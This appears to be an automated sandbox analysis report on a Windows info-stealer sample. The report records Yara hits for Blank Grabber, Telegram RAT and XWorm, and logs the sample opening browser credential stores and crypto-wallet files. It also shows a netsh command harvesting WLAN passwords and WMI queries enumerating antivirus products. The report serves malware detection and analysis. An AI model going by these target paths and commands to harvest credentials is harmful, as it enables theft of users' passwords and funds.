Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\word.exe	Queries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 0_2_00007FF64487D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF64487D010

Source: C:\Users\user\Desktop\sB2ClgrGng.exe

Code function: 0_2_00007FF644895E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,

0_2_00007FF644895E7C

Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe

Code function: 84_2_00007FF71F0D48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,

84_2_00007FF71F0D48CC

Source: C:\Users\user\AppData\Local\Temp\bound.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Source: bound.exe, 0000000F.00000002.4236005935.000000001BEF3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\bound.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 5816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxxz
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Exodusz
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98a	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeea	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\sB2ClgrGng.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match

File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 5816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key, type: DROPPED

Yara detected Telegram RAT

